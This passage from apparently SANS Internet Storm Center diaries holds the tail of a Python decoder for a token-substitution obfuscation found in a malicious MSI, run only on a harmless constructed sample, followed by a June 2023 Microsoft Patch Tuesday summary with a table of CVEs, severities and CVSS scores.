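    table_len = size * table_size
    tokens = split_tokens(data[:table_len], size)
    if len(tokens) != table_size or len(set(tokens)) != table_size:
        raise ValueError("translation table is incomplete or has duplicate tokens")
    translate = {token: i for i, token in enumerate(tokens)}
    payload = split_tokens(data[table_len:], size)
    unknown = [t for t in payload if t not in translate]
    if unknown:
        raise ValueError(f"payload tokens not in table: {unknown[:3]}")
    return "".join(chr(translate[t]) for t in payload)

def token_for(data: str, ch: str, size: int = TOKEN_SIZE) -> str:
    # Which token stands for ch under this blob's table (IZ for e in the diary's sample).
    return data[ord(ch) * size:(ord(ch) + 1) * size]

SAMPLE = encode('WScript.Echo "constructed sample"', 42)  # constructed, harmless
```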
At the time of analysis, the MSI file was no longer present on this file sharing service, and I could not find it on VirusTotal.
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com
ISC Stormcast For Wednesday, June 14th, 2023 https://isc.sans.edu/podcastdetail/8538, (Wed, Jun 14th)
June 2023 Microsoft Patch Tuesday, (Tue, Jun 13th)
Today's Microsoft patch Tuesday addresses 94 vulnerabilities. This includes 14 Chromium vulnerabilities patched in Microsoft Edge, and five GitHub vulnerabilities. Six of these vulnerabilities are rated as critical.
Three critical vulnerabilities are remote code execution vulnerabilities related to the Windows Pragmatic General Multicast (PGM) service. Past PGM vulnerabilities were related to the Microsoft Message Queue (MSMQ), for example, CVE-2023-28250, which was patched in April.
Two of the important vulnerabilities are caused by Microsoft Exchange. Exploitation requires authentication, so these remote code execution vulnerabilities are only regarded as important. But based on history with similar flaws, this issue is worth watching.
A critical vulnerability patched in SharePoint allows the spoofing of JWT authentication tokens to gain access as an authenticated user.
This month, none of the vulnerabilities were made public before patch Tuesday, and none of them are already exploited.
Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
.NET Framework Remote Code Execution Vulnerability | CVE-2023-29326 | No | No | - | - | Important | 7.8 | 6.8
.NET and Visual Studio Denial of Service Vulnerability | CVE-2023-32030 | No | No | - | - | Important | 7.5 | 6.7
.NET and Visual Studio Elevation of Privilege Vulnerability | CVE-2023-32032 | No | No | - | - | Important | 6.5 | 5.9
.NET and Visual Studio Elevation of Privilege Vulnerability | CVE-2023-33135 | No | No | - | - | Important | 7.3 | 6.6
.NET and Visual Studio Remote Code Execution Vulnerability | CVE-2023-33126 | No | No | - | - | Important | 7.3 | 6.6
.NET and Visual Studio Remote Code Execution Vulnerability | CVE-2023-33128 | No | No | - | - | Important | 7.3 | 6.6
.NET, .NET Framework, and Visual Studio Denial of Service Vulnerability | CVE-2023-29331 | No | No | - | - | Important | 7.5 | 6.7
.NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability | CVE-2023-24936 | No | No | - | - | Moderate | 8.1 | 7.1
.NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability | CVE-2023-24897 | No | No | - | - | Critical | 7.8 | 6.8
.NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability | CVE-2023-24895 | No | No | - | - | Important | 7.8 | 6.8
AutoDesk: CVE-2023-27909 Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 or prior | CVE-2023-27909 | No | No | - | - | Important | |
AutoDesk: CVE-2023-27910 stack buffer overflow vulnerability in Autodesk FBX SDK 2020 or prior | CVE-2023-27910 | No | No | - | - | Important | |
AutoDesk: CVE-2023-27911 Heap buffer overflow vulnerability in Autodesk FBX SDK 2020 or prior | CVE-2023-27911 | No | No | - | - | Important | |
Azure DevOps Server Spoofing Vulnerability | CVE-2023-21565 | No | No | - | - | Important | 7.1 | 6.2
Azure DevOps Server Spoofing Vulnerability | CVE-2023-21569 | No | No | - | - | Important | 5.5 | 4.8
Chromium: CVE-2023-2929 Out of bounds write in Swiftshader | CVE-2023-2929 | No | No | - | - | - | |
Chromium: CVE-2023-2930 Use after free in Extensions | CVE-2023-2930 | No | No | - | - | - | |
Chromium: CVE-2023-2931 Use after free in PDF | CVE-2023-2931 | No | No | - | - | - | |
Chromium: CVE-2023-2932 Use after free in PDF | CVE-2023-2932 | No | No | - | - | - | |
Chromium: CVE-2023-2933 Use after free in PDF | CVE-2023-2933 | No | No | - | - | - | |
Chromium: CVE-2023-2934 Out of bounds memory access in Mojo | CVE-2023-2934 | No | No | - | - | - | |
Chromium: CVE-2023-2935 Type Confusion in V8 | CVE-2023-2935 | No | No | - | - | - | |
Chromium: CVE-2023-2936 Type Confusion in V8 | CVE-2023-2936 | No | No | - | - | - | |
Chromium: CVE-2023-2937 Inappropriate implementation in Picture In Picture | CVE-2023-2937 | No | No | - | - | - | |
Chromium: CVE-2023-2938 Inappropriate implementation in Picture In Picture | CVE-2023-2938 | No | No | - | - | - | |
Chromium: CVE-2023-2939 Insufficient data validation in Installer | CVE-2023-2939 | No | No | - | - | - | |
Chromium: CVE-2023-2940 Inappropriate implementation in Downloads | CVE-2023-2940 | No | No | - | - | - | |
Chromium: CVE-2023-2941 Inappropriate implementation in Extensions API | CVE-2023-2941 | No | No | - | - | - | |
Chromium: CVE-2023-3079 Type Confusion in V8 | CVE-2023-3079 | No | No | - | - | - | |
DHCP Server Service Information Disclosure Vulnerability | CVE-2023-29355 | No | No | - | - | Important | 5.3 | 4.6
Dynamics 365 Finance Spoofing Vulnerability | CVE-2023-24896 | No | No | - | - | Important | 5.4 | 4.7
GDI Elevation of Privilege Vulnerability | CVE-2023-29359 | No | No | - | - | Important | 7.8 | 6.8
GitHub: CVE-2023-25652 "git apply --reject" partially-controlled arbitrary file write | CVE-2023-25652 | No | No | - | - | Important | |
GitHub: CVE-2023-25815 Git looks for localized messages in an unprivileged place | CVE-2023-25815 | No | No | - | - | Important | |
GitHub: CVE-2023-29007 Arbitrary configuration injection via `git submodule deinit` | CVE-2023-29007 | No | No | - | - | Important | |
GitHub: CVE-2023-29011 The config file of `connect.exe` is susceptible to malicious placing | CVE-2023-29011 | No | No | - | - | Important | |
GitHub: CVE-2023-29012 Git CMD erroneously executes `doskey.exe` in current directory, if it exists | CVE-2023-29012 | No | No | - | - | Important | |
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | CVE-2023-33143 | No | No | Less Likely | Less Likely | Moderate | 7.5 | 6.5
Microsoft Edge (Chromium-based) Information Disclosure Vulnerability | CVE-2023-33145 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7
Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | CVE-2023-29345 | No | No | Less Likely | Less Likely | Low | 6.1 | 5.3
Microsoft Excel Remote Code Execution Vulnerability | CVE-2023-32029 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Excel Remote Code Execution Vulnerability | CVE-2023-33137 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Excel Remote Code Execution Vulnerability | CVE-2023-33133 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2023-28310 | No | No | - | - | Important | 8.0 | 7.0
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2023-32031 | No | No | - | - | Important | 8.8 | 7.7
Microsoft ODBC Driver Remote Code Execution Vulnerability | CVE-2023-29373 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Office Remote Code Execution Vulnerability | CVE-2023-33146 | No | No | - | - | Important | 7.8 | 6.8
Microsoft OneNote Spoofing Vulnerability | CVE-2023-33140 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Outlook Remote Code Execution Vulnerability | CVE-2023-33131 | No | No | - | - | Important | 8.8 | 7.7
Microsoft PostScript Printer Driver Remote Code Execution Vulnerability | CVE-2023-32017 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Power Apps Spoofing Vulnerability | CVE-2023-32024 | No | No | - | - | Important | 3.0 | 2.6
Microsoft SharePoint Denial of Service Vulnerability | CVE-2023-33129 | No | No | - | - | Important | 6.5 | 5.7
Microsoft SharePoint Server Elevation of Privilege Vulnerability | CVE-2023-29357 | No | No | - | - | Critical | 9.8 | 8.5
Microsoft SharePoint Server Elevation of Privilege Vulnerability | CVE-2023-33142 | No | No | - | - | Important | 6.5 | 5.7
Microsoft SharePoint Server Spoofing Vulnerability | CVE-2023-33130 | No | No | - | - | Important | 7.3 | 6.4
Microsoft SharePoint Server Spoofing Vulnerability | CVE-2023-33132 | No | No | - | - | Important | 6.3 | 5.5
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | CVE-2023-29372 | No | No | - | - | Important | 8.8 | 7.7
NTFS Elevation of Privilege Vulnerability | CVE-2023-29346 | No | No | - | - | Important | 7.8 | 6.8
NuGet Client Remote Code Execution Vulnerability | CVE-2023-29337 | No | No | - | - | Important | 7.1 | 6.2
Remote Desktop Client Remote Code Execution Vulnerability | CVE-2023-29362 | No | No | - | - | Important | 8.8 | 7.7
Remote Procedure Call Runtime Denial of Service Vulnerability | CVE-2023-29369 | No | No | - | - | Important | 6.5 | 5.7
Sysinternals Process Monitor for Windows Denial of Service Vulnerability | CVE-2023-29353 | No | No | - | - | Low | 5.5 | 4.8
Visual Studio Code Spoofing Vulnerability | CVE-2023-33144 | No | No | - | - | Important | 5.0 | 4.5
Visual Studio Information Disclosure Vulnerability | CVE-2023-33139 | No | No | - | - | Important | 5.5 | 5.0
Windows Authentication Elevation of Privilege Vulnerability | CVE-2023-29364 | No | No | - | - | Important | 7.0 | 6.3
Windows Bus Filter Driver Elevation of Privilege Vulnerability | CVE-2023-32010 | No | No | - | - | Important | 7.0 | 6.1
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | CVE-2023-29361 | No | No | - | - | Important | 7.0 | 6.1
Windows Collaborative Translation Framework Elevation of Privilege Vulnerability | CVE-2023-32009 | No | No | - | - | Important | 8.8 | 7.7
Windows Container Manager Service Elevation of Privilege Vulnerability | CVE-2023-32012 | No | No | - | - | Important | 6.3 | 5.5
Windows CryptoAPI Denial of Service Vulnerability | CVE-2023-24937 | No | No | - | - | Important | 6.5 | 5.7
Windows CryptoAPI Denial of Service Vulnerability | CVE-2023-24938 | No | No | - | - | Important | 6.5 | 5.7
Windows DNS Spoofing Vulnerability | CVE-2023-32020 | No | No | - | - | Important | 3.7 | 3.2
Windows Filtering Platform Elevation of Privilege Vulnerability | CVE-2023-29368 | No | No | - | - | Important | 7.0 | 6.1
Windows GDI Elevation of Privilege Vulnerability | CVE-2023-29358 | No | No | - | - | Important | 7.8 | 6.8
Windows GDI Elevation of Privilege Vulnerability | CVE-2023-29371 | No | No | - | - | Important | 7.8 | 6.8
Windows Geolocation Service Remote Code Execution Vulnerability | CVE-2023-29366 | No | No | - | - | Important | 7.8 | 6.8
Windows Group Policy Elevation of Privilege Vulnerability | CVE-2023-29351 | No | No | - | - | Important | 8.1 | 7.1
Windows Hello Remote Code Execution Vulnerability | CVE-2023-32018 | No | No | - | - | Important | 7.8 | 6.8
Windows Hyper-V Denial of Service Vulnerability | CVE-2023-32013 | No | No | - | - | Critical | 6.5 | 5.7
Windows Installer Information Disclosure Vulnerability | CVE-2023-32016 | No | No | - | - | Important | 5.5 | 4.8
Windows Kernel Information Disclosure Vulnerability | CVE-2023-32019 | No | No | - | - | Important | 4.7 | 4.1
Windows Media Remote Code Execution Vulnerability | CVE-2023-29365 | No | No | - | - | Important | 7.8 | 6.8
Windows Media Remote Code Execution Vulnerability | CVE-2023-29370 | No | No | - | - | Important | 7.8 | 6.8
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability | CVE-2023-29363 | No | No | - | - | Critical | 9.8 | 8.5
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability | CVE-2023-32014 | No | No | - | - | Critical | 9.8 | 8.5
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability | CVE-2023-32015 | No | No | - | - | Critical | 9.8 | 8.5
Windows Remote Desktop Security Feature Bypass Vulnerability | CVE-2023-29352 | No | No | - | - | Important | 6.5 | 5.7
Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2023-32008 | No | No | - | - | Important | 7.8 | 6.8
Windows SMB Witness Service Security Feature Bypass Vulnerability | CVE-2023-32021 | No | No | - | - | Important | 7.1 | 6.2
Windows Server Service Security Feature Bypass Vulnerability | CVE-2023-32022 | No | No | - | - | Important | 7.6 | 6.6
Windows TPM Device Driver Elevation of Privilege Vulnerability | CVE-2023-29360 | No | No | - | - | Important | 7.8 | 6.8
Windows iSCSI Discovery Service Denial of Service Vulnerability | CVE-2023-32011 | No | No | - | - | Important | 7.5 | 6.5
Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability | CVE-2023-33141 | No | No | - | - | Important | 7.5 | 6.7
iSCSI Target WMI Provider Remote Code Execution Vulnerability | CVE-2023-29367 | No | No | - | - | Important | 7.8 | 6.8
---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
Twitter